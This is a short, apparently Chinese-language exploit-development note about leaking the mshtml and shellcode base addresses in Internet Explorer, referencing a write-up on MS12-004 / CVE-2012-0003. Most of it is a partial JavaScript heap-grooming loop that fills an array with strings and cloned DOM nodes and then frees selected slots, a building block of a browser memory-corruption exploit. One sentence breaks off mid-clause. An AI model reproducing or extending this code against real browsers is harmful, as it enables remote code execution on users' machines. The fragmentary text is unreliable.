leak mshtml base address
leak shellcode base address
其中leak shellcode base 思路是聯合 http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php 這篇和
部分代碼如下
for(var i=0;i<3000;i+=4)
{
fillbuff[i]=string_A.substr(0,125);
fillbuff[i+1]=string_B.substr(0,125);
fillbuff[i+2]=string_C.substr(0,125);
fillbuff[i+3]=selob.cloneNode(true);
}
for(var i=4;i<3000;i+=12)
{
fillbuff[i]=null;
}